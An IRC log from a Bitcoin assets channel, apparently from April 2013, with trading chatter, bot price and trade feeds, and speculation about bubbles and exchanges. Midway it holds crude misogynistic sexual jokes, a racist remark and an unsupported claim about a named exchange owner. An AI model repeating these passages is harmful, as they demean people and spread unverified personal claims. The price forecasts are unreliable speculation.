There are currently 177622.71 bitcoins demanded at or over 32.0 USD, worth 10173943.3472 USD in total. | Data vintage: 0.0061 seconds Apr 14 15:40:42 winklevoss twins gonna dump us down to 32 :) Apr 14 15:41:41 i wonder what price the winklevi got in at? Apr 14 15:41:57 someone told me 15 Apr 14 15:42:05 i dodnt read the article myself Apr 14 15:42:08 didnt* Apr 14 15:42:42 i suppose that qualifies as an "early adopter" in this environment Apr 14 15:43:07 they claim to have something like 100,000 BTC, eh? Apr 14 15:43:18 logically the only reason they'd say anything about it is if they bought high and it counts as a capital loss. Apr 14 15:43:24 they mustve heard about it though Silk Road press Apr 14 15:43:47 yeah they claim 1% Apr 14 15:43:59 ;;market --sell 100000 Apr 14 15:44:02 A market order to sell 100000 bitcoins right now would net 7018310.8642 USD and would take the last price down to 50.0100 USD, resulting in an average price of 70.1831 USD/BTC. | Data vintage: 0.0048 seconds Apr 14 15:44:11 not too bad Apr 14 15:44:55 mp: interesting interpretation... Apr 14 15:47:00 ;;market --sell 100 Apr 14 15:47:02 A market order to sell 100 bitcoins right now would net 9972.0481 USD and would take the last price down to 99.7000 USD, resulting in an average price of 99.7205 USD/BTC. | Data vintage: 0.0003 seconds Apr 14 15:55:17 !bids 0 Apr 14 15:55:44 its ;; for gribble Apr 14 15:55:56 *first coffee Apr 14 15:56:00 :) Apr 14 15:56:10 ;;bids 0 Apr 14 15:56:12 There are currently 44136852 bitcoins demanded at or over 0.0 USD, worth 14770558.6823 USD in total. | Data vintage: 0.0094 seconds Apr 14 15:56:32 ;;asks 50 Apr 14 15:56:33 There are currently 0 bitcoins offered at or under 50.0 USD, worth 0.0 USD in total. | Data vintage: 20.9177 seconds Apr 14 15:56:42 !bids 50 Apr 14 15:56:49 nein Apr 14 15:56:53 ;;bids 50 Apr 14 15:56:53 There are currently 109504.62 bitcoins demanded at or over 50.0 USD, worth 7521623.90265 USD in total. | Data vintage: 41.5160 seconds Apr 14 15:56:57 jajajajaja Apr 14 15:58:31 ;;eightball do i need a second coffee ? Apr 14 15:58:31 The outlook is good. Apr 14 15:59:12 ;;bc,stats Apr 14 15:59:15 Current Blocks: 231307 | Current Difficulty: 7672999.920164138 | Next Difficulty At Block: 231839 | Next Difficulty In: 532 blocks | Next Difficulty In About: 3 days, 3 hours, 6 minutes, and 21 seconds | Next Difficulty Estimate: 8984122.26112 | Estimated Percent Change: 17.08748 Apr 14 16:00:04 a few more weeks like that and 100 will be bottom Apr 14 16:01:47 yes Apr 14 16:02:46 the more time we spend between 90 and 110, the better, imo Apr 14 16:03:06 according to my maffs this bubble was ~4x smaller than the first one Apr 14 16:03:11 is bitfunder.com the best site to buy shares at? Apr 14 16:03:56 of course... Apr 14 16:04:08 $32 to 2 is whole different ball game Apr 14 16:05:12 then again, as much as I hope it stabalizes here, I think think it goes lower Apr 14 16:05:18 [BTCTC] [RSM] 14 @ 0.0018 = 0.0252 BTC [+] Apr 14 16:05:52 well Apr 14 16:05:55 i hope so too Apr 14 16:05:57 :) Apr 14 16:07:11 savetheinternet, i guess that would depends on what one is looking for Apr 14 16:07:16 -s Apr 14 16:07:56 btw, took a while to get down to $2... http://i.imgur.com/LWGXliJ.png Apr 14 16:08:48 i dunno, i only just got into the bitcoin assets game. i bought 490 of ASICMINER shares through bitfunder. but the site looks a bit dodgy/messy, and that WeExchange thing looks pretty bad too. just wondering if there's a preferred alternative to bitfunder everyone uses? is there a mtgox of bitcoin assets? Apr 14 16:08:50 that is true, Apr 14 16:08:57 but there isnt much place to go Apr 14 16:08:58 http://smpake.com/etc/btc/ Apr 14 16:09:21 btc-tc Apr 14 16:09:32 [BTCTC] [RSM] 3 @ 0.0018 = 0.0054 BTC [+] Apr 14 16:09:55 [MPEX] [S.MPOE] 7451 @ 0.00070797 = 5.2751 BTC [+] Apr 14 16:09:57 [MPEX] [S.MPOE] 3265 @ 0.00071053 = 2.3199 BTC [+] Apr 14 16:10:57 Fact. The owner of MPEX has attempted to sell NSFW photos of herself. Apr 14 16:10:59 lol? Apr 14 16:11:02 [HAVELOCK] [VTX] 21 @ 0.404 = 8.484 BTC [+] Apr 14 16:11:03 [HAVELOCK] [VTX] 1 @ 0.405 BTC [+] Apr 14 16:11:04 [HAVELOCK] [VTX] 4 @ 0.44 = 1.76 BTC [+] Apr 14 16:11:05 [HAVELOCK] [VTX] 5 @ 0.44 = 2.2 BTC [+] Apr 14 16:11:06 [HAVELOCK] [VTX] 1 @ 0.44 BTC [+] Apr 14 16:11:07 [HAVELOCK] [VTX] 115 @ 0.45 = 51.75 BTC [+] Apr 14 16:11:08 [HAVELOCK] [VTX] 50 @ 0.45 = 22.5 BTC [+] Apr 14 16:11:12 block halving bottom was 0.2 usd per 100mhash Apr 14 16:11:19 and it quickly picked up from there Apr 14 16:11:45 ;;ticker Apr 14 16:11:46 BTCUSD ticker | Best bid: 101.80001, Best ask: 101.96999, Bid-ask spread: 0.16998, Last trade: 101.80001, 24 hour volume: 181684.56390831, 24 hour low: 85.50000, 24 hour high: 116.89000, 24 hour vwap: 101.60381 Apr 14 16:11:50 some historical resistance shows at 0.6 Apr 14 16:12:43 interesting Apr 14 16:12:47 so if we are using hash power to normalize this a bit Apr 14 16:12:52 absolute bottom would be 50 Apr 14 16:13:04 which was accually hit Apr 14 16:13:50 but this is using weighted price Apr 14 16:14:17 interesting, but maybe I'm missing something - do you believe that there is a causal link here? Apr 14 16:15:51 taub the fact department is pretty thin Apr 14 16:16:05 savetheinternet mpex does about 80% of bitcoin denominated financials trade. Apr 14 16:16:05 well difficulty normally follows price Apr 14 16:16:54 pgp mining at the very least has the impact that when btc goes under mining cost miners move from selling to buying. Apr 14 16:17:05 but i think this should be taken into account in a way, i think its helpful a bit, navigating in this movements Apr 14 16:17:14 this switch would by far dominate any functioning market. Apr 14 16:17:20 is btc market functional ? anyone's guess. Apr 14 16:17:36 i see Apr 14 16:18:01 [HAVELOCK] [VTX] 1 @ 0.48 BTC [+] Apr 14 16:18:02 [HAVELOCK] [VTX] 1 @ 0.5 BTC [+] Apr 14 16:18:03 [HAVELOCK] [VTX] 4 @ 0.52 = 2.08 BTC [+] Apr 14 16:18:06 bitcoin really is its own beast, eh? Apr 14 16:18:13 yea Apr 14 16:18:18 nothing like it Apr 14 16:18:40 (waiting for goat to scream: LTC!!!) Apr 14 16:18:57 lol Apr 14 16:20:02 [HAVELOCK] [VTX] 1 @ 0.52 BTC [+] Apr 14 16:20:39 http://polimedia.us/dtng/c/src/136588457332.jpg Apr 14 16:20:51 lol Apr 14 16:21:08 it's sunday, i'm not at work ! i can open a MP link... Apr 14 16:21:32 2 times you screw me ! Apr 14 16:22:00 lol Apr 14 16:22:10 romania is in the red? Apr 14 16:22:16 great place to be. Apr 14 16:22:32 Open a link then close the window with a quick look behind me just to check if a workmate didnt see your nasty link Apr 14 16:22:46 it's only nasty if you're not doing it. Apr 14 16:23:14 ? naked on a quad Apr 14 16:23:14 here, just for error4733, a gif of my workplace http://polimedia.us/dtng/c/src/13606663711.gif Apr 14 16:24:00 hehe i'm green on the map ! i knew it ! never listen a girl Apr 14 16:24:52 portugal is oddly absent Apr 14 16:25:03 lol Apr 14 16:25:30 to much fur Apr 14 16:25:36 lol Apr 14 16:26:54 [BTCTC] [BTC-BOND] 7 @ 0.009999 = 0.07 BTC [-] Apr 14 16:27:24 where's the chart for vagina depth? Apr 14 16:27:32 :) Apr 14 16:28:03 and the subsequently overlay for delta values... that's the REAL data Apr 14 16:29:24 believe it or not i actually have an article about this. Apr 14 16:29:27 [BTCTC] [BTC-BOND] 1 @ 0.01 BTC [+] Apr 14 16:29:52 why does anyone think mp is a girl? Apr 14 16:30:02 http://trilema.com/2012/statistica-matematica-cu-numere/ it's in romanian, but the numbers you can get. Apr 14 16:30:16 ~120 mn kms of unused cunt in the world because of the delta. Apr 14 16:30:23 mp, if there is something you DON'T hace an article about, you're probably writing it now Apr 14 16:30:34 ThickAsThieves just as soon as i figure it out yeah. Apr 14 16:30:39 france is high bc they ahve lots of blacks there Apr 14 16:30:51 france always cheats. Apr 14 16:31:23 "As average vagina has a depth of 18 inches also result there globally about 120 million kilometers from unused pussy (taking round female population as 4 billion)." Apr 14 16:31:30 priceless Apr 14 16:31:47 lol Apr 14 16:31:57 actually, Apr 14 16:31:57 Adaugind toate astea rezulta ca pizda medie parcurge 10.8 metri per futai, in medieii. Cum un an are 12 luni rezulta ca intr-o viata (de 70 de ani) pizda medie parcurge-n pula 9.07 kilometri in decursul vietii ei. Cum ejacularea medie are cam doi mililitri rezulta ca pizda medie scoate o economie de 18.5 litri la suta de kmiii ceea ce-i de altfel destul de ineficient. Pe de alta parte emisiile nu polueaza (ci sunt chia Apr 14 16:31:57 r opusul polutiei). Apr 14 16:32:04 which says Apr 14 16:32:32 "adding it all up, the average cunny rides about 10.8 meters per fucking. since a year is 12 months long it comes to a lifetime's worth of riding being about 9.07kms. Apr 14 16:33:11 since the average cum is ~2ml, the average cunt runs on 18.5 liters / 100km efficiency, which isn't so very great. on the other hand emission doesn't pollute, being the exact opposite of pollution. Apr 14 16:33:50 there be great power in statistex Apr 14 16:34:36 nasty... Apr 14 16:38:30 aww Apr 14 16:38:41 [BTCTC] [ASICMINER-PT] 1 @ 0.839 BTC [+] Apr 14 16:40:25 https://coinbr.com/ref?c=294TNRz1oP Apr 14 16:40:29 coinbr is good too. Apr 14 16:40:46 oops, 8 pages in scrollback Apr 14 16:40:52 good morning all! Apr 14 16:41:16 hehe Apr 14 16:41:21 heya Apr 14 16:41:37 lol hi Apr 14 16:42:38 [MPEX] [S.MPOE] 17235 @ 0.00071053 = 12.246 BTC [+] Apr 14 16:42:40 [MPEX] [S.MPOE] 13750 @ 0.00071481 = 9.8286 BTC [+] Apr 14 16:42:45 wow, I now know what the average cunt runs on. thanks mp. Apr 14 16:42:56 [MPEX] [S.MPOE] 150 @ 0.00071749 = 0.1076 BTC [+] Apr 14 16:42:58 [MPEX] [S.MPOE] 4504 @ 0.00071817 = 3.2346 BTC [+] Apr 14 16:43:03 so should be riding my gf to work? Apr 14 16:43:15 on your dick yea Apr 14 16:43:37 either riding her to work or work on riding her works. Apr 14 16:45:02 excellent. mileage may vary. Apr 14 16:46:40 http://qz.com/74137/six-reasons-why-chinese-people-will-drive-the-next-bull-market-in-bitcoin/ Apr 14 16:58:56 [MPEX] [S.BBET] 80000 @ 0.00175 = 140 BTC [-] Apr 14 16:59:17 lotsa bitbet Apr 14 17:01:09 o hey Apr 14 17:01:14 !ticker m s.bbet Apr 14 17:01:16 [MPEX:S.BBET] 1D: 0.00175 / 0.00175 / 0.00175 (80000 shares, 14.00 BTC), 7D: 0.00079521 / 0.00173463 / 0.00199999 (110792 shares, 192.18 BTC), 30D: 0.00050015 / 0.00181392 / 0.00201401 (187840 shares, 340.73 BTC) Apr 14 17:01:38 um Apr 14 17:02:03 $vwap s.bbet Apr 14 17:02:05 mircea_popescu: S.BBET 1 day: average: 0.00175 high: 0.00175 low: 0.00175 volume: 80000 btc: 140.0 7 day: average: 0.00173464 high: 0.00199999 low: 0.00079521 volume: 110792 btc: 192.18398032 30 day: average: 0.00181392 high: 0.00201401 low: 0.00050015 volume: 187840 btc: 340.72766482 Apr 14 17:02:13 kakobrekla ^ bug in assbot ?! Apr 14 17:03:32 Rio Tinto’s Kennecott mine in Utah- the US’ 2nd largest silver mine and world’s largest copper mine has just suffered a massive landslide which will likely shut down production at the mine for years as upwards of 1 billion tons of dirt and ore have collapsed into the basin. Apr 14 17:04:34 usagi wins Apr 14 17:04:59 thats like 4mn oz of silver a year Apr 14 17:05:48 http://www.flickr.com/photos/riotinto-kennecottutahcopper/8644405476/sizes/z/in/photostream/ Apr 14 17:05:51 pretty cool pix Apr 14 17:07:15 wow that is cool Apr 14 17:11:35 http://www.youtube.com/watch?v=tSu5Yyc1bEM Apr 14 17:11:47 The only working product in this video is the laser engraver...? Apr 14 17:11:55 " " Apr 14 17:17:29 vid looks like it was made in 1995 Apr 14 17:19:11 i think that the last 12 hours has been the first period of time since bitcoin started to dive that we haven't had any significant lag... Apr 14 17:19:29 hooray for fee reinstatement! Apr 14 17:20:03 it seemed to be fixed before the fees Apr 14 17:20:21 ? Apr 14 17:20:25 i recall trading briskly for an hour or so and then being like wtf, fees? Apr 14 17:20:52 http://jezus.si/graf/dashboards/bitcoin/details/lag/ Apr 14 17:21:26 they crash the market to cover news servers cost :) Apr 14 17:21:37 lol Apr 14 17:22:02 the real improvement will come on apr 17th when the get rid of unfunded orders.. Apr 14 17:22:19 yep i dont know why they take so long to do that Apr 14 17:22:38 the feature will be missed Apr 14 17:22:43 give time to ppl to found account Apr 14 17:23:07 would be nice to have a triggered order feature Apr 14 17:23:08 it is interesting to note, though, that if they had a scaleable matching engine, lower fees would definately result in more volume... Apr 14 17:23:52 lots of competition emerging, i dont think mtgox will be really around after 2013 Apr 14 17:24:00 around, but not #1 Apr 14 17:24:06 RIP Apr 14 17:24:49 taub - what is the most credible solution/future competition you've heard about Apr 14 17:26:07 'cuz although I see more competitors coming to the table, I haven't heard of anything that compelling... Apr 14 17:26:11 [BTCTC] [PAJKA.BOND] 1 @ 0.09611 BTC [-] Apr 14 17:26:42 pgp http://www.reddit.com/r/Bitcoin/comments/1c7v6z/buttercoin_open_source_highperformance_bitcoin/ Apr 14 17:27:48 yea buttercoin, kraken, whatever max keiser is cooking up Apr 14 17:28:07 that exchange franchising business Apr 14 17:28:13 where you can rent software Apr 14 17:29:10 didn't rg "run" BitVPS and was responsible for the listing on MPeX? Apr 14 17:30:26 yeah - ok - nothing I haven't heard about... none of these approaches seem very convincing to me... Apr 14 17:35:55 is there someone who runs a bot on bitcoin-central? Apr 14 17:36:32 i cant manage the oauth2 verification, even if i run the exact same code that is in their example Apr 14 17:39:27 what docs u looking at Apr 14 17:43:25 bitcoin-central ? try bitcoinica ! Apr 14 17:47:32 error4733: hurr Apr 14 17:54:25 ;;nethash Apr 14 17:54:25 63526.5311894 Apr 14 17:55:08 5000 gone in a week Apr 14 18:00:33 [BTCTC] [B.YABMC] 5 @ 0.0135 = 0.0675 BTC [-] Apr 14 18:01:49 [BTCTC] [B.YABMC] 5 @ 0.014 = 0.07 BTC [+] Apr 14 18:04:01 [HAVELOCK] [VTX] 1 @ 0.441 BTC [-] Apr 14 18:05:18 [BTCTC] [PAJKA.BOND] 4 @ 0.1 = 0.4 BTC [+] Apr 14 18:06:26 [BTCTC] [PAJKA.BOND] 6 @ 0.1019 = 0.6114 BTC [+] Apr 14 18:08:01 [HAVELOCK] [KCIM] 1 @ 1.16 BTC [+] Apr 14 18:08:02 [BTCTC] [BTC-BOND] 5 @ 0.01 = 0.05 BTC [+] Apr 14 18:08:37 same % of new account provide paper for verifiaction, that what they say when some ppl ask the same question as you ! Apr 14 18:10:29 do accounts need to be verified before they can send API calls? Apr 14 18:10:43 or do you only need to verify to withdraw funds? Apr 14 18:12:01 [HAVELOCK] [KCIM] 1 @ 1.16 BTC [+] Apr 14 18:12:46 KRS1, i look at the official API doc from the homepage of bitcoin central Apr 14 18:13:17 https://github.com/paytunia/api-documentation Apr 14 18:13:29 dunno, but speculate on mtgox improvement before they happen is just... useless!? Apr 14 18:13:40 [BTCTC] [ASICMINER-PT] 1 @ 0.8433 BTC [+] Apr 14 18:13:49 [BTCTC] [ASICMINER-PT] 5 @ 0.8433 = 4.2165 BTC [+] Apr 14 18:16:27 KRS1, directly under Full usage example i used the ruby gem code Apr 14 18:17:30 it works all find at first and get the url for the authorization code, on token.get i get an empty boday Apr 14 18:17:32 body Apr 14 18:19:05 my guess is they change a lot last week Apr 14 18:19:46 with the secuity breach, maybe githud is not updated yet Apr 14 18:20:43 hm k, but isnt someone here running a bot on bitcoin central? Apr 14 18:22:32 ok hmm Apr 14 18:22:59 do u have the gems u need Apr 14 18:23:48 [BTCTC] [CRYPTO-TRADE] 50 @ 0.2 = 10 BTC [+] Apr 14 18:24:26 i think so Apr 14 18:25:00 [BTCTC] [CRYPTO-TRADE] 3 @ 0.2 = 0.6 BTC [+] Apr 14 18:25:09 or which one do you mean? Apr 14 18:30:51 KRS1, ? Apr 14 18:38:58 ;;eightball can we trust bitcoin-central ? Apr 14 18:38:58 One would be wise to think so. Apr 14 18:39:36 ;;nethash Apr 14 18:39:37 63526.5311894 Apr 14 18:41:16 ;;eightball can we trust mtgox ? Apr 14 18:41:16 No clue. Apr 14 18:48:22 [MPEX] [S.MPOE] 20250 @ 0.00070057 = 14.1865 BTC [-] Apr 14 18:53:16 [BTCTC] [SYNERGY] 1 @ 0.109 BTC [-] Apr 14 19:04:27 [BTCTC] [CRYPTO-TRADE] 1 @ 0.2 BTC [+] Apr 14 19:06:12 [MPEX] [S.MPOE] 4950 @ 0.00070585 = 3.494 BTC [+] Apr 14 19:06:16 [MPEX] [S.MPOE] 8300 @ 0.00071043 = 5.8966 BTC [+] Apr 14 19:20:02 [HAVELOCK] [VTX] 2 @ 0.441 = 0.882 BTC [-] Apr 14 19:22:19 ;;seen ThickAsThieves Apr 14 19:22:20 ThickAsThieves was last seen in #bitcoin-assets 1 hour, 27 minutes, and 11 seconds ago: 5000 gone in a week Apr 14 19:22:24 ;;seen smickles Apr 14 19:22:25 smickles was last seen in #bitcoin-assets 1 week, 3 days, 0 hours, 39 minutes, and 52 seconds ago: a bitcoin atm could be the easiest way to send money to a friend, each of you just goes to an atm Apr 14 19:22:41 ThickAsThieves: why does usagi win? Apr 14 19:23:00 [MPEX] [S.MPOE] 9854 @ 0.00071437 = 7.0394 BTC [+] Apr 14 19:23:04 ;;bids 0 Apr 14 19:23:07 There are currently 44183451 bitcoins demanded at or over 0.0 USD, worth 14395071.0479 USD in total. | Data vintage: 0.0215 seconds Apr 14 19:23:12 because he deals in silver Apr 14 19:23:16 [BTCTC] [BTC-GOLD] 1 @ 0.0099 BTC [-] Apr 14 19:23:23 and now there is way less getting mined Apr 14 19:23:57 Bugpowder whatchoo think about current price Apr 14 19:24:15 It's 100 Apr 14 19:24:19 as expected Apr 14 19:24:23 i quote the 30$ pronostic Apr 14 19:24:32 ;) Apr 14 19:24:34 i'm thinking a rally tonight and tomorrow Apr 14 19:24:35 quote the $100 prognositc Apr 14 19:24:49 30 is a 3 month price target Apr 14 19:25:04 wobble around 100, then a slow fade over the next 2 months Apr 14 19:25:05 last night someone was maintaining a 7k btc floor for a long time Apr 14 19:25:14 at 100 Apr 14 19:25:21 so you short all your btc ? Apr 14 19:25:27 nope Apr 14 19:25:29 the 30% remaning Apr 14 19:25:30 I cashed 70% Apr 14 19:25:35 the 30% I hold Apr 14 19:25:53 I mean, my deep analysis is based on lining up the last bubble chart to this one Apr 14 19:25:57 so... Apr 14 19:26:03 yes i saw this pic... Apr 14 19:26:04 not a lot of confidence there :) Apr 14 19:26:12 bearish pic Apr 14 19:26:38 I don't really have a great idea of where its going, but the past bubble pattern has me worried Apr 14 19:26:39 how can u compar 2 different event ? Apr 14 19:26:52 they were both bubbles Apr 14 19:26:53 same crash but totally different context Apr 14 19:27:07 yes but similar patterns happen all the time Apr 14 19:27:16 the ripple following a sharp move Apr 14 19:27:18 for example Apr 14 19:27:22 happens every time Apr 14 19:27:31 I don't know where it is going Apr 14 19:28:04 My feeling is that the EV on the 3 month timescale, if you were long BTC at this price, is negative Apr 14 19:28:11 on the 3 year timescale, positive Apr 14 19:28:43 where can i short btcs? Apr 14 19:28:44 I have bids starting at 52 and going down to 13. Apr 14 19:29:00 borrow some btc from bakewelll Apr 14 19:29:46 bakewell haha, any news ? didn't follow Apr 14 19:30:12 he'll be happy to read you Apr 14 19:30:19 Bugpowder: the times change though. 100 could be the actual price Apr 14 19:30:24 sure Apr 14 19:30:27 anything below could be cheap coins Apr 14 19:30:32 could be Apr 14 19:30:39 If someone competent arrives to the game the price will rise again Apr 14 19:30:42 that my mojo : any coin under 100 its cheap ! Apr 14 19:30:42 I think it will get cheaper though Apr 14 19:30:52 you want to buy the bottom Apr 14 19:30:56 not halfway down Apr 14 19:31:13 Yea but what if that never occurs because someone arrives to the game. Apr 14 19:31:16 Sets up shop like a mobster. Apr 14 19:31:32 then you miss out Apr 14 19:31:36 If I were a hedgefund manager and saw all this news I would rush to btc world due to lack of regulation. Apr 14 19:31:43 hence I'm keeping 30% in btc Apr 14 19:32:14 Making money was easy on the way up the bubble Apr 14 19:32:20 now its going to get tougher for a while Apr 14 19:33:21 isnt bakewell scam? Apr 14 19:33:24 time will say ;) we just need a good news, that it Apr 14 19:33:45 short 600btc @35$ is a scam ? :D Apr 14 19:34:37 yes bake well scammed Apr 14 19:35:14 [MPEX] [S.MPOE] 4480 @ 0.00071817 = 3.2174 BTC [+] Apr 14 19:35:16 [MPEX] [S.MPOE] 8974 @ 0.00072046 = 6.4654 BTC [+] Apr 14 19:35:27 [MPEX] [S.MPOE] 1596 @ 0.0007217 = 1.1518 BTC [+] Apr 14 19:35:50 Bugpowder: why do you think MPOE stock is skyrocketing today? Apr 14 19:36:20 mp turned the S.MPOE buying bot back on ;-) Apr 14 19:36:25 [MPEX] [S.MPOE] 549 @ 0.00071437 = 0.3922 BTC [-] Apr 14 19:36:41 hehe Apr 14 19:36:48 is it skyrocketing? Apr 14 19:41:09 !ticker m S.MPOE Apr 14 19:41:10 [MPEX:S.MPOE] 1D: 0.00068596 / 0.00070525 / 0.000735 (444127 shares, 313.22 BTC), 7D: 0.00063322 / 0.00069453 / 0.000735 (2621860 shares, 1,820.98 BTC), 30D: 0.00059218 / 0.00068957 / 0.00077505 (10865175 shares, 7,492.41 BTC) Apr 14 19:41:14 Bugpowder: it crashed after March no? Apr 14 19:41:29 .006 Apr 14 19:41:44 .0006 Apr 14 19:42:02 yea that was pretty low Apr 14 19:42:22 do you think bondholders are going to keep their money this time lol? Apr 14 19:42:23 usually a good idea to buy at .0006 Apr 14 19:42:26 Bugpowder, speaking of bubble, imho this one was 4times smaller Apr 14 19:42:37 than 2011? Apr 14 19:42:43 yes Apr 14 19:42:50 how so? Apr 14 19:42:53 2011 was 30 -> 5 Apr 14 19:42:54 what is the baseline Apr 14 19:43:01 http://smpake.com/etc/btc/ Apr 14 19:43:04 so its about 6 times lostt in value Apr 14 19:43:05 2011 was 33->2 Apr 14 19:43:20 93% loss Apr 14 19:43:42 ;;calc 266/33*2 Apr 14 19:43:43 16.1212121212 Apr 14 19:43:47 and that chart uses weighted daily price Apr 14 19:43:55 [BTCTC] [ASICMINER-PT] 2 @ 0.85 = 1.7 BTC [+] Apr 14 19:44:11 What's the deal with ASICMINER did they announce new divs? Apr 14 19:44:20 I feel so behind in asset world Apr 14 19:44:24 at the current diff the bottom would be 50 (0.2 mhash per 100 around) Apr 14 19:45:05 they previewed their new usb miner Apr 14 19:45:09 could you rephrase kakobrekla ? Apr 14 19:45:36 hm? Apr 14 19:45:39 whats not clear? Apr 14 19:45:48 are you saying miners need 50usd / coin? Apr 14 19:45:50 well I would say, 16.1212 is the bottom Apr 14 19:45:51 to operate? Apr 14 19:46:10 which is basically the price when the bubble started to inflate Apr 14 19:46:35 im saying so far in these years Apr 14 19:46:36 [BTCTC] [ASICMINER-PT] 1 @ 0.85 BTC [+] Apr 14 19:46:39 0.2 was the bottom support Apr 14 19:46:51 which i expect to slowly getting lower since asic Apr 14 19:46:55 but that means half a year or so Apr 14 19:47:22 even with the block reward halving Apr 14 19:47:25 [BTCTC] [ASICMINER-PT] 2 @ 0.85 = 1.7 BTC [+] Apr 14 19:47:38 bottom was 0.2 and it picked up from there rather quickly Apr 14 19:48:42 look we are all speculating here Apr 14 19:48:44 mostly Apr 14 19:49:04 but imho this should be concireder Apr 14 19:49:05 d Apr 14 19:50:19 Bug, re your ideas for the fiat portfolio yesterday, have you considered sticking to options on other asset classes rather than EFTs / funds / stocks? E.g. 80-90% treasuries 10%-20% at risk in 10-40 small longshot speculations per year? Apr 14 19:50:21 So if diff doubles... Apr 14 19:50:28 Taleb's barbell risk strategy Apr 14 19:50:38 it's an interesting idea Apr 14 19:50:52 but I'm pretty vanilla in my investments outside of bitcoin Apr 14 19:51:14 also treasuries are pretty dangerous right now Apr 14 19:51:19 It has the advantage of avoiding the fact that in a bear market / crisis, all asset classes are suddenly highly correlated in a rush to liquidity. Apr 14 19:51:52 Yes I wouldn't touch 'em but here in Canada I use vanilla "high interest" savings accounts or money market funds for that portion. Apr 14 19:52:10 the danger is interest rate risk Apr 14 19:52:28 if you are doing 2 year T Bills or shorter term, very little risk Apr 14 19:52:36 but also, very little interest rate Apr 14 19:53:23 If you mean your return on 80% of your portfolio may not keep up with inflation, my position on that is: who cares? The longshot options in the other 10-20%, the at risk portion of the portfolio, are what will provide portfolio return. Apr 14 19:53:57 I should probably read that book Apr 14 19:54:06 what are the long shots though? Apr 14 19:54:12 Max downdraft in any one year, no matter what happens, is the amount in your Risk On slice, if every one of the 40 positions you take turns out to lose 100%. Apr 14 19:54:23 Out of the money options. Black Swans. Apr 14 19:55:22 E.g. Apple in January, Amazon shortly after, that MLM company Ackman and Icahn are fighting over Apr 14 19:56:34 I'm not a big believer in Modern Portfolio Theory after 2008. Apr 14 19:57:11 I was in this strategy then and the portfolio was horizontal when all the world was crashing around us. Apr 14 19:57:47 nothing trumps common sense Apr 14 19:57:55 never invest in things you dont understand Apr 14 19:58:34 Here is my target allocations Apr 14 19:58:35 http://imgur.com/ZBAoEdq Apr 14 19:58:43 I don't try picking any stocks Apr 14 19:59:06 Herbalife, that's the one I was thinking of: http://stockcharts.com/h-sc/ui?s=HLF ... incredible volatility as the giants duked it out and tried to screw each other over. Apr 14 19:59:38 Right, but with options you take synthetic positions, e.g. straddles and strangles. You're already doing it here. Apr 14 20:00:16 I did a fair amount of options trading in 0708 Apr 14 20:00:18 Pick a company that could have drama in the next 90 days: earnings at risk, ridiculously overvalued or undervalued. Apr 14 20:00:19 was exciting Apr 14 20:00:40 yeah but after earnings the volatility premium suddenly drops Apr 14 20:00:42 makes it tough Apr 14 20:01:00 I had huge account swings with options trading Apr 14 20:01:07 finally blew the account up Apr 14 20:01:13 Yes you have to assume you will lose 100% on a trade if you are wrong and restrict your bet size accordingly. Apr 14 20:01:15 So I quit Apr 14 20:01:23 and now I just do vanilla Apr 14 20:01:34 and I'm averaging a 7.5% return Apr 14 20:01:47 over the last 5 years Apr 14 20:01:55 not spectaular but not bad. Apr 14 20:02:14 Change that chart to CROX weekly and check out 2011: it was priced on earnings expectations that would have meant that every shoe sold in the US would be a Croc for the next N years. Bubble, had to pop. Apr 14 20:02:39 Buy a few puts with a long enough time horizon to be right, and then wait. Apr 14 20:02:52 getting the timing is very tough Apr 14 20:03:11 Agreed... I've been early and I've been late. Apr 14 20:04:01 Bugpowder: never try to time the market Apr 14 20:04:26 Taleb says it's like a thousand little paper cuts. A bunch of little ouches but you never "blow up" and lose too much. Apr 14 20:05:10 I think its a very reasonable strat Apr 14 20:05:17 more timeconsuming though Apr 14 20:05:45 I just fire and forget, trying to keep my target distributions correct without selling Apr 14 20:05:53 I tend to put on one new trade a month when a situation comes to light. Some have a 1-year time horizon, some are 1-mo. Apr 14 20:05:54 [MPEX] [S.MPOE] 4450 @ 0.00070057 = 3.1175 BTC [-] Apr 14 20:05:56 [MPEX] [S.MPOE] 7400 @ 0.00069248 = 5.1244 BTC [-] Apr 14 20:05:58 and update the targets every 3-5 years Apr 14 20:06:02 [MPEX] [S.MPOE] 1650 @ 0.00068596 = 1.1318 BTC [-] Apr 14 20:06:50 [BTCTC] [BASIC-MINING] 2 @ 0.41 = 0.82 BTC [+] Apr 14 20:06:51 With Herbalife I missed it by a day. Formulated a strategy one night, was eating breakfast the next AM and the situation happened pre-market. Apr 14 20:07:06 I almost spit out my Cheerios. Apr 14 20:07:43 I did a write up, I'll have to get a blog up and post it. Apr 14 20:08:21 I better get back to programming. Got to make a living or I'll have nothing to trade with! Apr 14 20:09:02 [MPEX] [S.DICE] 250 @ 0.00328066 = 0.8202 BTC [-] Apr 14 20:15:14 COOL! Apr 14 20:15:30 mtgox counted all my trades during the 0 fee time towards my 30day volume Apr 14 20:16:17 this lack of volatility is boring Apr 14 20:16:32 its a shame i'll send a ticket to support now Apr 14 20:16:35 are you at the max now bug? Apr 14 20:16:36 0.4% :) Apr 14 20:16:51 2k for me Apr 14 20:16:54 0.34 Apr 14 20:16:56 I should have made some more trades! Apr 14 20:16:59 0.43 Apr 14 20:17:11 I could have made 0.3 Apr 14 20:17:47 wish they would allow like special deals for 0%... Apr 14 20:20:46 [MPEX] [S.DICE] 2926 @ 0.00328066 = 9.5992 BTC [-] Apr 14 20:28:30 nice Apr 14 20:28:38 bitcoinity added historical spread Apr 14 20:28:42 on the plot Apr 14 20:30:00 [HAVELOCK] [VTX] 1 @ 0.44 BTC [-] Apr 14 20:37:54 [MPEX] [S.MPOE] 11400 @ 0.00070089 = 7.9901 BTC [+] Apr 14 20:39:35 nice! Apr 14 20:40:11 i'm not sure how to read the green and red on the top graph Apr 14 20:40:24 hell, or even the bottom. :/ Apr 14 20:44:15 green was the buying price red the selling price yellow ligne is average bottom is wall with all btc asked (green) or open for sale ((rede) Apr 14 20:44:59 so the aim of this game is buy low and sell high to the next lot of buyers and give yourself a golden parachute all the way down to 50? Apr 14 20:45:13 error, awesome, thank you! Apr 14 20:45:37 BitHub: sounds like a good game. Apr 14 20:45:48 yep Apr 14 20:46:54 Do you miss the top ? ;) Apr 14 20:47:01 ? Apr 14 20:47:13 i'm pushing for single digi's Apr 14 20:48:05 http://bitcoin.speedstats.org/ this might be helpful when you have to move btc quickly... Apr 14 20:48:14 i stopped buying when it went over 100 beause it was just a scam Apr 14 20:48:30 i burn a candle every night on my satoshi's temple for this too Apr 14 20:48:31 ya, i stopped at 62 Apr 14 20:48:53 liking this 100 tho Apr 14 20:49:33 i expect it to drop over the 